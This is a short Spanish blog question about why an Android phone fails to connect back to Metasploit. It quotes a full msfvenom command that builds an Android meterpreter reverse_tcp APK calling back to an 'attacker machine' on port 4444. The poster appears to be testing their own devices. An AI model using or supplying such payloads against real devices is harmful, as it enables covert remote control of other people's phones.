Blog

¿Android no se conecta de nuevo a Metasploit con la carga útil de la aplicación?

Estoy tratando de conectar mi dispositivo Android a metasploit a través de tcp inverso, pero nunca aparece en la consola. Tengo un Nexus 5 con Nethunter y Android 5.1.1

El comando que utilicé fue: msfvenom -p android / meterpreter / reverse_tcp LHOST = 192.168.43.124 LPORT = 4444 R> base.apk

En mi caso, 192.168.43.124 es la máquina atacante y 4444 es el puerto predeterminado que me dio Metasploit. Según tengo entendido, la IP del teléfono no es importante. He probado esto en varios dispositivos y redes y no puedo conectarlo.

¿Necesito seleccionar arquitectura o tiempo de ejecución?

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar